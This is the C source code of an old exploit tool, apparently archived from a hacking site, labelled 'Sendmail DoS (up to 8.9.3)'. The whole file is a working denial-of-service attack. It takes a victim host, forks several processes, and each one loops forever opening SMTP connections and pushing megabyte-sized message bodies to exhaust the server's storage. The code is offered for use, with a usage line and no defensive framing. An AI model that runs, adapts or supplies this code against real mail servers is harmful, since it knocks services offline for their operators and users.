home *** CD-ROM | disk | FTP | other *** search
- /*
- By Michal Szymanski <siwa9@box43.gnet.pl>
- Sendmail DoS (up to 8.9.3);
- Sat Apr 3 00:12:31 CEST 1999
- */
-
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <netdb.h>
- #include <errno.h>
-
- #undef VERBOSE /* define it, if MORECONN is undefined */
-
- #define MORECONN
-
- // #define RCPT_TO "foo@ftp.onet.pl"
-
- #define RCPT_TO "foo@10.255.255.255"
-
- #ifdef MORECONN
- #define MAXCONN 5
- #endif
-
- #define BSIZE 1048576 /* df* control file size */
- #define PORT 25
-
- char buffer[BSIZE];
- int sockfd,x,loop,chpid;
-
- void usage(char *fname)
- {
- fprintf(stderr,"Usage: %s <victim_host>\n",fname);
- exit(1);
- }
-
- void say(char *what)
- {
-
- if (write(sockfd,what,strlen(what))<0)
- {
- perror("write()");
- exit(errno);
- }
-
- #ifdef VERBOSE
- fprintf(stderr,"<%s",what);
- #endif
-
- bzero(buffer,BSIZE);
-
- usleep(1000);
-
- if (read(sockfd,buffer,BSIZE)<0)
- {
- perror("read()");
- exit(errno);
- }
-
- #ifdef VERBOSE
- fprintf(stderr,buffer);
- #endif
- }
-
-
- int main(int argc,char *argv[])
- {
- struct sockaddr_in serv_addr;
- struct hostent *host;
- char *hostname,hostaddr[20];
-
- fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");
-
- if (argc<2) usage(argv[0]);
-
- #ifdef VERBOSE
- fprintf(stderr,">Preparing address. \n");
- #endif
-
- hostname=argv[1];
-
- serv_addr.sin_port=htons(PORT);
- serv_addr.sin_family=AF_INET;
-
- if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1)
- {
-
- #ifdef VERBOSE
- fprintf(stderr,">Getting info from DNS.\n");
- #endif
-
- if ((host=gethostbyname(hostname))==NULL)
- {
- herror("gethostbyname()");
- exit(h_errno);
- }
-
- serv_addr.sin_family=host->h_addrtype;
-
- bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length);
-
- #ifdef VERBOSE
- fprintf(stderr,">Official name of host: %s\n",host->h_name);
- #endif
-
- hostname=host->h_name;
-
- sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
- (unsigned char)host->h_addr[1],
- (unsigned char)host->h_addr[2],
- (unsigned char)host->h_addr[3]);
-
- }
- else sprintf(hostaddr,"%s",hostname);
-
- #ifdef MORECONN
- for (;loop<MAXCONN;loop++) if (!(chpid=fork()))
- {
- #endif
-
- for(;;)
- {
-
- bzero(&(serv_addr.sin_zero),8);
-
- if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
- {
- perror("socket()");
- exit(errno);
- }
-
- if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1)
- {
- perror("connect()");
- exit(errno);
- }
-
- #ifdef VERBOSE
- fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
- #endif
-
- bzero(buffer,BSIZE);
- read(sockfd,buffer,BSIZE);
- #ifdef VERBOSE
- fprintf(stderr,buffer);
- #else
- fprintf(stderr,".");
- #endif
-
- say("helo foo\n");
- say("mail from:root@localhost\n");
- say("rcpt to:" RCPT_TO "\n");
- say("data\n");
-
- for (x=0;x<=BSIZE;x++) buffer[x]='X';
- write(sockfd,buffer,BSIZE);
-
- say("\n.\n");
- sleep(1);
- say("quit\n");
-
- shutdown(sockfd,2);
-
- close(sockfd);
-
- #ifdef VERBOSE
- fprintf(stderr,">Connection closed succesfully.\n");
- #endif
- }
- #ifdef MORECONN
- }
- waitpid(chpid,NULL,0);
- #endif
- return 0;
- }
- /* www.hack.co.za [2000]*/